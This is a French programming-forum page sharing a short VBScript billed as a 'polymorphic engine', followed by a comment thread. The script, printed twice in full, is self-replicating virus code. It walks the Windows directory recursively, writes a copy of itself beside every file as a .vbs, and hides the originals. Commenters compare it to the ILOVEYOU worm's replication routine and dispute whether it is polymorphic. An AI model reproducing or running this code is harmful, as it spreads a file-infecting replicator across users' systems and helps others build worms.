begin process at 2010 02 10 13:16:53
  Trouver un code source :
 
dans
 
[ Dernières recherches ]
Accueil > 

Code

 > 

VBScript

 > MOTEUR POLYMORPHE VBSCRIPT

MOTEUR POLYMORPHE VBSCRIPT


 Information sur la source

Note :
8,33 / 10 - par 3 personnes
8,33 / 10

  • 1

  • 2

  • 3

  • 4

  • 5

  • 6

  • 7

  • 8

  • 9

  • 10
Catégorie :VBScript Niveau :Débutant Date de création :04/11/2002 Date de mise à jour :08/11/2002 01:43:42 Vu :5 358
Auteur : wbr

Ecrire un message privé
Site perso
Commentaire sur cette source (18)
Ajouter un commentaire et/ou une note

 Description

Voilà voilà un beau petit moteur polymorphe en vbscript. J'ausais pas trop le mettre sur le site parce que j'aime pas les mauvais commentaires.. Mais voilà, je l'ai fais quand même! Alors il est assé simple à comprendre. Il recherche tous les fichiers des dossier et sous-dossiers de windows puis une fois qu'il les a trouvé, il fait une copie de lui même avec le nom du fichier trouver + .vbs et ensuite il cache le fichier source. Donc, si vous le lancez par erreur, pas de panique! Le polymorphe ne détrui aucun fichier dans le système, il ne fait que faire une copie de lui-même.

Source

  • 'Coded by SnakeUnion.com
  • Set Fso = Wscript.CreateObject("Scripting.FileSystemObject")
  • Set File = fso.OpenTextFile(WScript.ScriptFullName, 1)
  • Set Afolder=FSO.GetFolder(WINDIR)
  • WINDIR = Fso.GetSpecialFolder(0)
  • vbscopy = File.ReadAll
  • Recherche AFolder
  • Function Recherche (ByRef AFolder)
  • For Each AFile In AFolder.Files
  • If Not UCase(FSO.GetExtensionName(AFile.Path)) = "VBS" Then
  • Set VBS = fso.CreateTextFile(AFile & ".vbs", True)
  • VBS.write vbscopy
  • VBS.Close
  • Set Att = fso.GetFile(AFile.Path)
  • Att.Attributes = Att.Attributes + 2
  • End if
  • Next
  • For Each SubF In AFolder.SubFolders
  • Recherche SubF
  • Next
  • End Function
  • 'End 
'Coded by SnakeUnion.com
Set Fso = Wscript.CreateObject("Scripting.FileSystemObject")
Set File = fso.OpenTextFile(WScript.ScriptFullName, 1)
Set Afolder=FSO.GetFolder(WINDIR)
WINDIR = Fso.GetSpecialFolder(0)
vbscopy = File.ReadAll
Recherche AFolder
Function Recherche (ByRef AFolder)
For Each AFile In AFolder.Files
If Not UCase(FSO.GetExtensionName(AFile.Path)) = "VBS" Then
Set VBS = fso.CreateTextFile(AFile & ".vbs", True)
VBS.write vbscopy
VBS.Close
Set Att = fso.GetFile(AFile.Path)
Att.Attributes = Att.Attributes + 2
End if
Next
For Each SubF In AFolder.SubFolders
Recherche SubF
Next
End Function
'End

 Conclusion

SnakeUnion.com, ouvert dès le 10 Janvier
Programmation VB :: VBS :: Delphi :: PHP :: CSS :: PSM  


 Sources du même auteur

Source avec Zip FLIP SCREEN
Source avec Zip Source avec une capture CRYPTEUR SIMPLE 1.2
Source avec Zip Source avec une capture CRYPTEUR SIMPLE
Toutes les sources de wbr

 Sources de la même categorie

AFFICHER LES SESSIONS ACTUELLEMENT OUVERTES par djebbipgm
SCRIPT VBS DE DÉFINITION DE MOT DE PASSE par djebbipgm
ACTIVATION/DÉSACTIVATION DE PROXY WEB par djebbipgm
CRÉATION DE SOUS-RÉPERTOIRE À PARTIR DU MENU CONTEXTUEL par djebbipgm
CORRIGER RÉCURSIVEMENT LA CIBLE DES RACCOURCIS D'UN RÉPERTOI... par sammounier
Toutes les sources de la catégorie VBScript

Commentaires et avis

Commentaire de iubito le 04/11/2002 14:40:05

pardon? ça sert à koa ton truc?

Commentaire de Warny le 04/11/2002 17:45:04

C'est une partie du code de réplication du virus I LOVE YOU
Il manque l'inscription dans la registry et l'envoie par outlook pour que ce soit complet

Commentaire de DAN le 04/11/2002 22:20:45

Polymorpre ce truck na ca modifie pas son code
tin voila un vrai polymorphe vbs
http://www.vbfrance.com/article.aspx?Val=5557
tu men dira des nouvelle

Commentaire de Stormy le 05/11/2002 00:19:14

tout ces polymorphes ne valent pas les usages utilisés dans un worm digne de ce nom. On est très loin ici du virus "I love you", bien que le but n'était pas de s'en approché. Je ne saurais trop vous conseiller l'utilisation d'un script editor de vbs. C'est certes d'une facilité déconcertante mais grâce à cela on apprend beaucoup de choses. Un dernier conseil, passez à WMI c'est plus constructif que VBS. Bon courage et @+  (je donne 7 pour l'effort...)

Commentaire de wbr le 05/11/2002 00:40:42

Warny > si tu trouve que ça ça ressemble a I Love you il y a confusion.. Premièrement loveletter cherche quelques extension précises et prédéfini. Sois les fichiers sont ÉCRASÉ par le code de loveletter sois il se passe la même chose que mon code. Et DAN, si tu trouve que ça se reproduit pas tu devrais l'esseyer avant pour voir, tu m'en dira des nouvelles...

Commentaire de rodrigos le 05/11/2002 07:52:29

stormy > quand tu dis de passer à WMI plutôt que vbs, tu oublie que WMI est utilisé depuis VBS.
Et quand tu parle l'utilisation d'un script editor, précise lequel!!!
MErci

Commentaire de zappy le 05/11/2002 10:27:23

Un virus polymorphe est sensé se modifier lui même (il y a mieux encore, les virus génétiques, mais c'est une autre histoire ;).

Ce code se duplique bien, mais il ne se modifie pas, une simple recherche de chaine dans les fichiers vbs suffit pour le detecter.

A+

Commentaire de DAN le 05/11/2002 12:48:36

gosney a bin raison ton truck ne modifie pas son code source mais il fait juste se reproduire comme il etais avant
.

Commentaire de TheSaib le 05/11/2002 20:37:10 administrateur CS

En plus de çà "ne le copiez pas sans laisser l'url en haut du code.. merci ! "

1. Ya 3 lignes de code que bcp peuvent reproduirent
2. Pour proteger avec des droits d'auteur faut un minimum ou etre reconnu universellement
3. On change le nom des variables et on modifie le code un tant sois peu et ds ce cas ce n'est plus régie par les droits d'auteur puisque il y modification substencielle.

Conclusion : arretez de nous peter les couilles avec des codes bidons repris d'ailleurs , si tu pose ton code ici c pour qu'on l'utilise alors les phrases comme celle que tu as mis sont inutiles

Commentaire de Stormy le 05/11/2002 23:36:16

thesaib! que de violence... A part ça, je répond à notre ami (pertinent d'ailleurs) Rodrigos. Il y a confusion dans ton raisonnement. VBS, WMI, JV et tant d'autre sont tous des sous-utilisation de WSH (Windows Scripting Host). Où est la différence alors? VBS utilise Wscript pour les scripts en mode graphique et Cscript pour le mode texte simple. Or, WMI sollicite un autre interpréteur (absent des versions W98, présent sur 2000 et XP) conjointement aux deux autres susdits. L'usage est plus orienté réseau et internet. @+

Commentaire de yoman64 le 07/11/2002 18:15:21

En passant , la connaissence na pas de propriétaires.
Et allezvous faire foutre ceux qui pense comme lui!
Je peux vous comprendre si kelkun copie tout le code mais si il le modifie ou il l'utilise en partie ,ben la...

Commentaire de yoman64 le 07/11/2002 18:16:35

Ah et en plus j'ai oublier de te dire kelke chose thesaib!... Ben la c ke ta entierement raisons et que c'Est bien ke des gars komme toi existe pour remettre les autres a leurs place :)

Commentaire de Stormy le 07/11/2002 23:06:05

Et pis je vais dire à la maitresse que t pas gentil avec tes petits camarades...Yoman (8 ans) retourne en classe stp.

Commentaire de wbr le 08/11/2002 01:39:24

Ha ha ha! yoman64, arrête tu va me faire crever les poumons tellement je suis mdr! Avant de poser tes commentaires tu devrais peut-être vérifier si tu as bien lu.
Tu me dis "Je peux vous comprendre si quelqu?un copie tout le code mais s?il le modifie ou il l'utilise en partie ,ben la... ". J'ai dit "ne le copiez pas sans laisser l'url en haut du code.. merci !", Pas si vous prenez quelconque partie de ce code laissez mon URL en haut. Je sais bien tout ça, que ça ne sert pratiquement à rien de mettre ce genre de message parce que tout le monde s'en fou et copie sans laisser aucun commentaire. Mais n'empêche qu?il y a toujours des personnes qui finissent par copier l'intégralité d'un code et laisse au moins UNE SEULE LIGNE qui contient mon url dans le haut de leur programme. En fait, ce que je n'arrive pas trop à comprendre c'est pourquoi vous discutez presque uniquement sur ce sujet plutôt que de commenter le code? Si ça vous dérange à ce point que j'ai laissé ce message, vous n'avez qu'à me demander de l'enlever, ce n'est pas vraiment nécessaire de parler de ça puisque ça n'à même pas d'importance réelle à mes yeux! Et yoman, toi qui à écrit 32 ans sur ton profil, pourquoi perds-tu ton temps à m'insulter? Normalement c'est plus de ton âge. Et au cas ou je ne l'aurais pas encore dis, ça ne mène absolument à rien de s'envoyer se faire foutre et de s'insulter sans arrêt.

Commentaire de Stormy le 08/11/2002 23:31:32

Euh... là WBR tu confonds avec moi. Le gamin (Yoman) lui il n'a que quatorze ans.
C'est, semble-t-il, se que son profil indique

Commentaire de wbr le 09/11/2002 00:36:19

oh sorry mauvais bouton.. mais ça ne change de rien ce que j'ai dis auparavant.

Commentaire de algori le 23/01/2005 20:50:58

C'est pas du tout polymorphe ce truc !!!!!!!!!!!
Y'a rien qui change à part l'attribut du fichier.

Commentaire de tekila_bandita le 09/08/2005 10:44:49

Ceci est une partie du code de i love you.
Ceci est peut etre pomper, mais je trouve pas mal de l'avoir mis, car i love you est asser barbare.
j'ai déja éssayé de récupérer cette partie, mais je n'ai jamais réussie.
donc je trouve cette source pas mal quand meme...

 Ajouter un commentaire

Nos sponsors


Sondage...

Comparez les prix


Console Nintendo Wii
Entre 220€ et 307€

Visiter le guide achat

CalendriCode

Février 2010
LMMJVSD
1234567
891011121314
15161718192021
22232425262728

Consulter la suite du CalendriCode
 
Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 0,530 sec (3)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales
Outils Convertisseur VB/C# Snippets et scripts Outils en ligne La ToolBox
Communauté Programmation Photographie Technologie Newsgroups Emploi Forum Blogs
Guide d'achat Téléphonie mobile Image et son Informatique Bureautique Jeux vidéo
Logiciels Internet & Réseau Développement Market Android Jeux & Loisirs Graphisme Multimédia Sécurité Pilotes
Loisirs Cartes virtuelles Vidéos droles Jeux en ligne Géoguide AndroLib (Android Market)